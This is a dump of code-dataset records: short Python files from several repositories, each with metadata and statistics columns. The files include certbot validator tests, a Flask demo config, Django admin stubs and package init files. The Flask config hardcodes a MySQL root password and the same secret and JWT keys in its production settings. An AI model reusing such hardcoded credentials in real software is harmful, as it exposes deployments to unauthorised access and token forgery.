"MIT"
] | null | null | null |
rapidminer/__init__.py
|
ruturajnene/rapidminer-conda-package
|
6f5cb00914dca6f5968b42d7312034aba37156f4
|
[
"MIT"
] | null | null | null |
rapidminer/__init__.py
|
ruturajnene/rapidminer-conda-package
|
6f5cb00914dca6f5968b42d7312034aba37156f4
|
[
"MIT"
] | null | null | null |
from .automodel import AutoModelClient
from .rm_handler import RapidMinerClient
| 39.5
| 40
| 0.886076
| 9
| 79
| 7.666667
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088608
| 79
| 2
| 40
| 39.5
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
6b2c1cbb5cbad77b1ee4a11e3be027ba5bdcbc83
| 206
|
py
|
Python
|
stweet/tweets_by_ids_runner/tweets_by_ids_result.py
|
iJohnMaged/stweet
|
00f4a12b1da1be514266b74a7ca70a669f0c8ae4
|
[
"MIT"
] | null | null | null |
stweet/tweets_by_ids_runner/tweets_by_ids_result.py
|
iJohnMaged/stweet
|
00f4a12b1da1be514266b74a7ca70a669f0c8ae4
|
[
"MIT"
] | null | null | null |
stweet/tweets_by_ids_runner/tweets_by_ids_result.py
|
iJohnMaged/stweet
|
00f4a12b1da1be514266b74a7ca70a669f0c8ae4
|
[
"MIT"
] | null | null | null |
"""Class with result of TweetSearchRunner task."""
from dataclasses import dataclass
@dataclass
class TweetsByIdsResult:
"""Class with result of TweetSearchRunner task."""
downloaded_count: int
| 18.727273
| 54
| 0.757282
| 22
| 206
| 7.045455
| 0.636364
| 0.116129
| 0.193548
| 0.219355
| 0.490323
| 0.490323
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160194
| 206
| 10
| 55
| 20.6
| 0.895954
| 0.432039
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
8628832167b30d3bcaeadd49e22faceea7b74669
| 2,332
|
py
|
Python
|
DailyProgrammer/DP20130114A.py
|
DayGitH/Python-Challenges
|
bc32f1332a92fcc2dfa6f5ea4d95f8a8d64c3edf
|
[
"MIT"
] | 2
|
2020-12-23T18:59:22.000Z
|
2021-04-14T13:16:09.000Z
|
DailyProgrammer/DP20130114A.py
|
DayGitH/Python-Challenges
|
bc32f1332a92fcc2dfa6f5ea4d95f8a8d64c3edf
|
[
"MIT"
] | null | null | null |
DailyProgrammer/DP20130114A.py
|
DayGitH/Python-Challenges
|
bc32f1332a92fcc2dfa6f5ea4d95f8a8d64c3edf
|
[
"MIT"
] | null | null | null |
"""
[01/14/13] Challenge #117 [Easy] Hexdump to ASCII
https://www.reddit.com/r/dailyprogrammer/comments/16jiuq/011413_challenge_117_easy_hexdump_to_ascii/
# [](#EasyIcon) *(Easy)*: Hexdump to ASCII
Hexadecimal is a base-16 representation of a number. A single byte of information, as an unsigned integer, can have a
value of 0 to 255 in decimal. This byte can be represented in hexadecimal, from a range of 0x0 to 0xFF in hexadecimal.
Your job is to open a given file (using the given file name) and print every byte's hexadecimal value.
*Author: PoppySeedPlehzr*
# Formal Inputs & Outputs
## Input Description
As a program command-line argument to the program, accept a valid file name.
## Output Description
Print the given file's contents, where each byte of the file must be printed in hexadecimal form. Your program must
print 16 bytes per line, where there is a space between each hexadecimal byte. Each line must start with the line
number, starting from line 0, and must also count in hexadecimal.
# Sample Inputs & Outputs
## Sample Input
"MyFile.txt" (This file is an arbitrary file as an example)
## Sample Output
00000000 37 7A BC AF 27 1C 00 03 38 67 83 24 70 00 00 00
00000001 00 00 00 00 49 00 00 00 00 00 00 00 64 FC 7F 06
00000002 00 28 12 BC 60 28 97 D5 68 12 59 8C 17 8F FE D8
00000003 0E 5D 2C 27 BC D1 87 F6 D2 BE 9B 92 90 E8 FD BA
00000004 A2 B8 A9 F4 BE A6 B8 53 10 E3 BD 60 05 2B 5C 95
00000005 C4 50 B4 FC 10 DE 58 80 0C F5 E1 C0 AC 36 30 74
00000006 82 8B 42 7A 06 A5 D0 0F C2 4F 7B 27 6C 5D 96 24
00000007 25 4F 3A 5D F4 B2 C0 DB 79 3C 86 48 AB 2D 57 11
00000008 53 27 50 FF 89 02 20 F6 31 C2 41 72 84 F7 C9 00
00000009 01 04 06 00 01 09 70 00 07 0B 01 00 01 23 03 01
0000000A 01 05 5D 00 00 01 00 0C 80 F5 00 08 0A 01 A8 3F
0000000B B1 B7 00 00 05 01 11 0B 00 64 00 61 00 74 00 61
0000000C 00 00 00 14 0A 01 00 68 6E B8 CF BC A0 CD 01 15
0000000D 06 01 00 20 00 00 00 00 00
# Challenge Input
Give your program its own binary file, and have it print itself out!
## Challenge Input Solution
This is dependent on how you write your code and what platform you are on.
# Note
* As an added bonus, attempt to print out any ASCII strings, if such data is found in your given file.
"""
def main():
pass
if __name__ == "__main__":
main()
| 44.846154
| 118
| 0.722556
| 479
| 2,332
| 3.488518
| 0.54071
| 0.045482
| 0.043088
| 0.033513
| 0.050269
| 0.044285
| 0
| 0
| 0
| 0
| 0
| 0.262479
| 0.23542
| 2,332
| 51
| 119
| 45.72549
| 0.674706
| 0.966981
| 0
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
86884fd188141f2cf6a6d9b96eafb13ba15c4986
| 2,957
|
py
|
Python
|
backend/config.py
|
jimbunny/vue-flask-mysql-demo
|
7d2a1883b1c5779bfa4e6bc9afcdb1a53a89c995
|
[
"MIT"
] | null | null | null |
backend/config.py
|
jimbunny/vue-flask-mysql-demo
|
7d2a1883b1c5779bfa4e6bc9afcdb1a53a89c995
|
[
"MIT"
] | null | null | null |
backend/config.py
|
jimbunny/vue-flask-mysql-demo
|
7d2a1883b1c5779bfa4e6bc9afcdb1a53a89c995
|
[
"MIT"
] | 1
|
2021-09-20T10:53:40.000Z
|
2021-09-20T10:53:40.000Z
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# author:jingtongyu
# datetime:2020/6/7 10:14 下午
# software: PyCharm
import os
import multiprocessing
basedir = os.path.abspath(os.path.dirname(__file__))
MODE = 'develop' # develop: 开发模式; production: 生产模式
class ProductionConfig(object):
"""
生产配置
"""
BIND = '0.0.0.0:5000'
WORKERS = multiprocessing.cpu_count() * 2 + 1
WORKER_CONNECTIONS = 10000
BACKLOG = 64
TIMEOUT = 60
LOG_LEVEL = 'INFO'
LOG_DIR_PATH = os.path.join(os.path.dirname(__file__), 'logs')
LOG_FILE_MAX_BYTES = 1024 * 1024 * 100
LOG_FILE_BACKUP_COUNT = 10
PID_FILE = 'run.pid'
# sqlite 数据库配置
# SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(os.path.dirname(__file__), 'example.db')
# SQLALCHEMY_TRACK_MODIFICATIONS = False
HOSTNAME = 'container_mysql'
PORT = '3306'
DATABASE = 'demo'
USERNAME = 'root'
PASSWORD = 'password'
# SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:root@127.0.0.1/tushare?charset=utf8'
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://{}:{}@{}:{}/{}?charset=utf8'.format(USERNAME, PASSWORD, HOSTNAME, PORT,
DATABASE)
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
SQLALCHEMY_TRACK_MODIFICATIONS = True
BASEDIR = basedir
# 安全配置
CSRF_ENABLED = True
SECRET_KEY = 'jklklsadhfjkhwbii9/sdf\sdf'
JWT_EXPIRY_HOURS = 1
JWT_REFRESH_DAYS = 1
JWT_SECRET = 'jklklsadhfjkhwbii9/sdf\sdf'
class DevelopConfig(object):
"""
开发配置
"""
BIND = '0.0.0.0:5000'
WORKERS = 2
WORKER_CONNECTIONS = 1000
BACKLOG = 64
TIMEOUT = 30
LOG_LEVEL = 'DEBUG'
LOG_DIR_PATH = os.path.join(os.path.dirname(__file__), 'logs')
LOG_FILE_MAX_BYTES = 1024 * 1024
LOG_FILE_BACKUP_COUNT = 1
PID_FILE = 'run.pid'
# sqlite 数据库配置
# SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(os.path.dirname(__file__), 'example.db')
# SQLALCHEMY_TRACK_MODIFICATIONS = False
# SQLALCHEMY_DATABASE_URI = "mysql+pymysql://root:password@127.0.0.1/demo"
HOSTNAME = 'container_mysql'
PORT = '3306'
DATABASE = 'demo'
USERNAME = 'root'
PASSWORD = 'password'
# SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:root@127.0.0.1/tushare?charset=utf8'
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://{}:{}@{}:{}/{}?charset=utf8'.format(USERNAME, PASSWORD, HOSTNAME, PORT,
DATABASE)
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
SQLALCHEMY_TRACK_MODIFICATIONS = True
BASEDIR = basedir
# 安全配置
CSRF_ENABLED = True
SECRET_KEY = 'jklklsadhfjkhwbii9/sdf\sdf'
JWT_EXPIRY_HOURS = 1
JWT_REFRESH_DAYS = 1
JWT_SECRET = 'jklklsadhfjkhwbii9/sdf\sdf'
if MODE == 'production':
config = ProductionConfig
else:
config = DevelopConfig
| 31.457447
| 118
| 0.636456
| 345
| 2,957
| 5.202899
| 0.324638
| 0.040111
| 0.081894
| 0.047354
| 0.728134
| 0.728134
| 0.707521
| 0.686351
| 0.686351
| 0.686351
| 0
| 0.047534
| 0.238756
| 2,957
| 93
| 119
| 31.795699
| 0.749889
| 0.234021
| 0
| 0.633333
| 0
| 0
| 0.161479
| 0.085701
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.066667
| 0.033333
| 0
| 0.866667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
86db575c61cf864ea5cc9bcb607bb8918eaf7ebd
| 45
|
py
|
Python
|
src/BribeNet/helpers/bribeNetException.py
|
RobMurray98/BribeNet
|
09ddd8f15d9ab5fac44ae516ed92c6ba5e5119bc
|
[
"MIT"
] | null | null | null |
src/BribeNet/helpers/bribeNetException.py
|
RobMurray98/BribeNet
|
09ddd8f15d9ab5fac44ae516ed92c6ba5e5119bc
|
[
"MIT"
] | null | null | null |
src/BribeNet/helpers/bribeNetException.py
|
RobMurray98/BribeNet
|
09ddd8f15d9ab5fac44ae516ed92c6ba5e5119bc
|
[
"MIT"
] | null | null | null |
class BribeNetException(Exception):
pass
| 15
| 35
| 0.777778
| 4
| 45
| 8.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 45
| 2
| 36
| 22.5
| 0.921053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
86edbdb55ae1edc8dbd045ba3df65934861aad0a
| 5,168
|
py
|
Python
|
letsencrypt/certbot-compatibility-test/certbot_compatibility_test/validator_test.py
|
fengshukun/intapp
|
b09e8ee0ebf8eaa1474e1c9bd075ef9fd1fb1726
|
[
"MIT"
] | 1
|
2019-12-23T06:39:49.000Z
|
2019-12-23T06:39:49.000Z
|
letsencrypt/certbot-compatibility-test/certbot_compatibility_test/validator_test.py
|
fengshukun/intapp
|
b09e8ee0ebf8eaa1474e1c9bd075ef9fd1fb1726
|
[
"MIT"
] | null | null | null |
letsencrypt/certbot-compatibility-test/certbot_compatibility_test/validator_test.py
|
fengshukun/intapp
|
b09e8ee0ebf8eaa1474e1c9bd075ef9fd1fb1726
|
[
"MIT"
] | null | null | null |
"""Tests for certbot_compatibility_test.validator."""
import unittest
import mock
import OpenSSL
import requests
from acme import errors as acme_errors
from certbot_compatibility_test import validator
class ValidatorTest(unittest.TestCase):
def setUp(self):
self.validator = validator.Validator()
@mock.patch(
"certbot_compatibility_test.validator.crypto_util.probe_sni")
def test_certificate_success(self, mock_probe_sni):
cert = OpenSSL.crypto.X509()
mock_probe_sni.return_value = cert
self.assertTrue(self.validator.certificate(
cert, "test.com", "127.0.0.1"))
@mock.patch(
"certbot_compatibility_test.validator.crypto_util.probe_sni")
def test_certificate_error(self, mock_probe_sni):
cert = OpenSSL.crypto.X509()
mock_probe_sni.side_effect = [acme_errors.Error]
self.assertFalse(self.validator.certificate(
cert, "test.com", "127.0.0.1"))
@mock.patch(
"certbot_compatibility_test.validator.crypto_util.probe_sni")
def test_certificate_failure(self, mock_probe_sni):
cert = OpenSSL.crypto.X509()
cert.set_serial_number(1337)
mock_probe_sni.return_value = OpenSSL.crypto.X509()
self.assertFalse(self.validator.certificate(
cert, "test.com", "127.0.0.1"))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_succesful_redirect(self, mock_get_request):
mock_get_request.return_value = create_response(
301, {"location": "https://test.com"})
self.assertTrue(self.validator.redirect("test.com"))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_redirect_with_headers(self, mock_get_request):
mock_get_request.return_value = create_response(
301, {"location": "https://test.com"})
self.assertTrue(self.validator.redirect(
"test.com", headers={"Host": "test.com"}))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_redirect_missing_location(self, mock_get_request):
mock_get_request.return_value = create_response(301)
self.assertFalse(self.validator.redirect("test.com"))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_redirect_wrong_status_code(self, mock_get_request):
mock_get_request.return_value = create_response(
201, {"location": "https://test.com"})
self.assertFalse(self.validator.redirect("test.com"))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_redirect_wrong_redirect_code(self, mock_get_request):
mock_get_request.return_value = create_response(
303, {"location": "https://test.com"})
self.assertFalse(self.validator.redirect("test.com"))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_hsts_empty(self, mock_get_request):
mock_get_request.return_value = create_response(
headers={"strict-transport-security": ""})
self.assertFalse(self.validator.hsts("test.com"))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_hsts_malformed(self, mock_get_request):
mock_get_request.return_value = create_response(
headers={"strict-transport-security": "sdfal"})
self.assertFalse(self.validator.hsts("test.com"))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_hsts_bad_max_age(self, mock_get_request):
mock_get_request.return_value = create_response(
headers={"strict-transport-security": "max-age=not-an-int"})
self.assertFalse(self.validator.hsts("test.com"))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_hsts_expire(self, mock_get_request):
mock_get_request.return_value = create_response(
headers={"strict-transport-security": "max-age=3600"})
self.assertFalse(self.validator.hsts("test.com"))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_hsts(self, mock_get_request):
mock_get_request.return_value = create_response(
headers={"strict-transport-security": "max-age=31536000"})
self.assertTrue(self.validator.hsts("test.com"))
@mock.patch("certbot_compatibility_test.validator.requests.get")
def test_hsts_include_subdomains(self, mock_get_request):
mock_get_request.return_value = create_response(
headers={"strict-transport-security":
"max-age=31536000;includeSubDomains"})
self.assertTrue(self.validator.hsts("test.com"))
def test_ocsp_stapling(self):
self.assertRaises(
NotImplementedError, self.validator.ocsp_stapling, "test.com")
def create_response(status_code=200, headers=None):
"""Creates a requests.Response object for testing"""
response = requests.Response()
response.status_code = status_code
if headers:
response.headers = headers
return response
if __name__ == '__main__':
unittest.main() # pragma: no cover
| 41.015873
| 74
| 0.707237
| 622
| 5,168
| 5.596463
| 0.159164
| 0.04424
| 0.08848
| 0.142201
| 0.769319
| 0.759552
| 0.759552
| 0.744614
| 0.733984
| 0.733984
| 0
| 0.016874
| 0.174342
| 5,168
| 125
| 75
| 41.344
| 0.798922
| 0.021672
| 0
| 0.469388
| 0
| 0
| 0.24004
| 0.1778
| 0
| 0
| 0
| 0
| 0.153061
| 1
| 0.173469
| false
| 0
| 0.061224
| 0
| 0.255102
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
86efffd189ba0331ec0a27290f4e063cbc63e34e
| 140
|
py
|
Python
|
app_server/admin.py
|
Saketh-Chandra/Honeywell_Hackathon_2021
|
8ce6ca9e2a2c17bbb628d899cc6faa8472227171
|
[
"MIT"
] | null | null | null |
app_server/admin.py
|
Saketh-Chandra/Honeywell_Hackathon_2021
|
8ce6ca9e2a2c17bbb628d899cc6faa8472227171
|
[
"MIT"
] | null | null | null |
app_server/admin.py
|
Saketh-Chandra/Honeywell_Hackathon_2021
|
8ce6ca9e2a2c17bbb628d899cc6faa8472227171
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(Object)
admin.site.register(Param)
| 20
| 32
| 0.792857
| 20
| 140
| 5.55
| 0.6
| 0.162162
| 0.306306
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 140
| 6
| 33
| 23.333333
| 0.895161
| 0.185714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
81011236161b8d80d2f643a5043c6fc06e19bb35
| 208
|
py
|
Python
|
pleque/core/__init__.py
|
kripnerl/pleque
|
af351c4aa4a40aa5bb5bdaa8083575344c0827e2
|
[
"MIT"
] | 13
|
2018-11-08T11:59:37.000Z
|
2022-03-14T20:17:38.000Z
|
pleque/core/__init__.py
|
kripnerl/pleque
|
af351c4aa4a40aa5bb5bdaa8083575344c0827e2
|
[
"MIT"
] | 18
|
2018-07-31T12:17:37.000Z
|
2020-05-19T08:36:42.000Z
|
pleque/core/__init__.py
|
kripnerl/pleque
|
af351c4aa4a40aa5bb5bdaa8083575344c0827e2
|
[
"MIT"
] | 3
|
2018-08-26T07:50:04.000Z
|
2021-12-03T11:44:57.000Z
|
from .coordinates import Coordinates
from .fluxfunctions import FluxFunctions
from .fluxsurface import Surface, FluxSurface
from .surfacefunctions import SurfaceFunctions
from .equilibrium import Equilibrium
| 34.666667
| 46
| 0.870192
| 21
| 208
| 8.619048
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100962
| 208
| 5
| 47
| 41.6
| 0.967914
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8121d0d1292de21475421123d6ef16c334017d6b
| 19
|
py
|
Python
|
flask-service/db_base.py
|
lifefloating/flask-classic
|
898c669bb126fc7dac05f1c0309d47a8d6564d5d
|
[
"MIT"
] | 1
|
2020-10-21T08:35:35.000Z
|
2020-10-21T08:35:35.000Z
|
flask-service/db_base.py
|
lifefloating/flask-classic
|
898c669bb126fc7dac05f1c0309d47a8d6564d5d
|
[
"MIT"
] | null | null | null |
flask-service/db_base.py
|
lifefloating/flask-classic
|
898c669bb126fc7dac05f1c0309d47a8d6564d5d
|
[
"MIT"
] | null | null | null |
# db mysql // mongo
| 19
| 19
| 0.631579
| 3
| 19
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 19
| 1
| 19
| 19
| 0.8
| 0.894737
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8143d175c42ca16e951019abf18a439375d1cb52
| 117
|
py
|
Python
|
__init__.py
|
SmartMobilityAlgorithms/utilities
|
1c7125b941d8d60ec656c3b28e3836d614d2dead
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
SmartMobilityAlgorithms/utilities
|
1c7125b941d8d60ec656c3b28e3836d614d2dead
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
SmartMobilityAlgorithms/utilities
|
1c7125b941d8d60ec656c3b28e3836d614d2dead
|
[
"Apache-2.0"
] | 1
|
2022-01-24T17:17:07.000Z
|
2022-01-24T17:17:07.000Z
|
import sys
try:
import google.colab
sys.path.insert(0, "/content/Utilities")
except:
pass
from .src import *
| 11.7
| 42
| 0.700855
| 17
| 117
| 4.823529
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010417
| 0.179487
| 117
| 9
| 43
| 13
| 0.84375
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.142857
| 0.428571
| 0
| 0.428571
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 5
|
d48e5f625431268fe6a3447f1d6068c2303205ee
| 59
|
py
|
Python
|
trac/trac/timeline/tests/__init__.py
|
HelionDevPlatform/bloodhound
|
206b0d9898159fa8297ad1e407d38484fa378354
|
[
"Apache-2.0"
] | 84
|
2015-01-07T03:42:53.000Z
|
2022-01-10T11:57:30.000Z
|
trac/trac/timeline/tests/__init__.py
|
HelionDevPlatform/bloodhound
|
206b0d9898159fa8297ad1e407d38484fa378354
|
[
"Apache-2.0"
] | 1
|
2021-11-04T12:52:03.000Z
|
2021-11-04T12:52:03.000Z
|
trac/trac/timeline/tests/__init__.py
|
HelionDevPlatform/bloodhound
|
206b0d9898159fa8297ad1e407d38484fa378354
|
[
"Apache-2.0"
] | 35
|
2015-01-06T11:30:27.000Z
|
2021-11-10T16:34:52.000Z
|
from trac.timeline.tests.functional import functionalSuite
| 29.5
| 58
| 0.881356
| 7
| 59
| 7.428571
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 59
| 1
| 59
| 59
| 0.945455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
be074d91dc9aaeb00117674431c6ee61031e9a98
| 581
|
py
|
Python
|
test/test.py
|
shervin-glitch/PyScriptTools
|
338fe08e26e7032f074006b450d3fdcea9d50934
|
[
"MIT"
] | 3
|
2022-01-15T19:00:47.000Z
|
2022-01-21T13:08:16.000Z
|
test/test.py
|
shervin-glitch/PyScriptTools
|
338fe08e26e7032f074006b450d3fdcea9d50934
|
[
"MIT"
] | null | null | null |
test/test.py
|
shervin-glitch/PyScriptTools
|
338fe08e26e7032f074006b450d3fdcea9d50934
|
[
"MIT"
] | null | null | null |
""" Single Importation """
import PyScriptTools
""" Package Meta Data """
from PyScriptTools import MetaData
""" Package Classes """
from PyScriptTools import CPUTools
from PyScriptTools import GPUTools
from PyScriptTools import RAMTools
from PyScriptTools import DiskTools
from PyScriptTools import OtherTools
from PyScriptTools import SystemTools
from PyScriptTools import NetworkTools
""" Package Modules """
from PyScriptTools import validators # or from PyScriptTools.validators import *
from PyScriptTools import exceptions # or from PyScriptTools.exceptions import *
| 27.666667
| 81
| 0.814114
| 61
| 581
| 7.754098
| 0.344262
| 0.43129
| 0.486258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134251
| 581
| 21
| 82
| 27.666667
| 0.940358
| 0.182444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
be2ba7acfc6a6948febd6f16293d0df1bef8525f
| 137
|
py
|
Python
|
example/sample_app/admin.py
|
natgeosociety/django-formfield
|
de6c39876d004045e86e6e76ff45df43bcc31b8b
|
[
"Apache-2.0"
] | 16
|
2015-01-09T07:02:27.000Z
|
2019-08-18T03:10:38.000Z
|
example/sample_app/admin.py
|
natgeosociety/django-formfield
|
de6c39876d004045e86e6e76ff45df43bcc31b8b
|
[
"Apache-2.0"
] | 8
|
2015-12-07T14:51:53.000Z
|
2020-04-18T10:00:35.000Z
|
example/sample_app/admin.py
|
natgeosociety/django-formfield
|
de6c39876d004045e86e6e76ff45df43bcc31b8b
|
[
"Apache-2.0"
] | 3
|
2016-01-25T22:40:43.000Z
|
2018-04-19T19:03:34.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.contrib import admin
from .models import Person
admin.site.register(Person)
| 15.222222
| 32
| 0.715328
| 20
| 137
| 4.9
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008475
| 0.138686
| 137
| 8
| 33
| 17.125
| 0.822034
| 0.306569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
07c7a25506d34a7174eb5c5154dcc8d17caf124f
| 155
|
py
|
Python
|
certmgr/scripts/cert_renewal_hook.py
|
sillsdev/TheCombine
|
d8f87c464c5a770019d55eefb3dc6a276ab9da13
|
[
"MIT"
] | 14
|
2019-06-14T23:18:04.000Z
|
2021-09-04T03:28:32.000Z
|
certmgr/scripts/cert_renewal_hook.py
|
sillsdev/TheCombine
|
d8f87c464c5a770019d55eefb3dc6a276ab9da13
|
[
"MIT"
] | 1,114
|
2019-06-05T15:40:26.000Z
|
2022-03-29T16:07:37.000Z
|
certmgr/scripts/cert_renewal_hook.py
|
sillsdev/TheCombine
|
d8f87c464c5a770019d55eefb3dc6a276ab9da13
|
[
"MIT"
] | 9
|
2019-07-31T13:41:15.000Z
|
2021-12-06T16:50:02.000Z
|
#!/usr/bin/env python3
"""Push updated certificates to AWS S3 bucket."""
from aws import aws_push_certs
if __name__ == "__main__":
aws_push_certs()
| 17.222222
| 49
| 0.716129
| 23
| 155
| 4.304348
| 0.73913
| 0.141414
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015385
| 0.16129
| 155
| 8
| 50
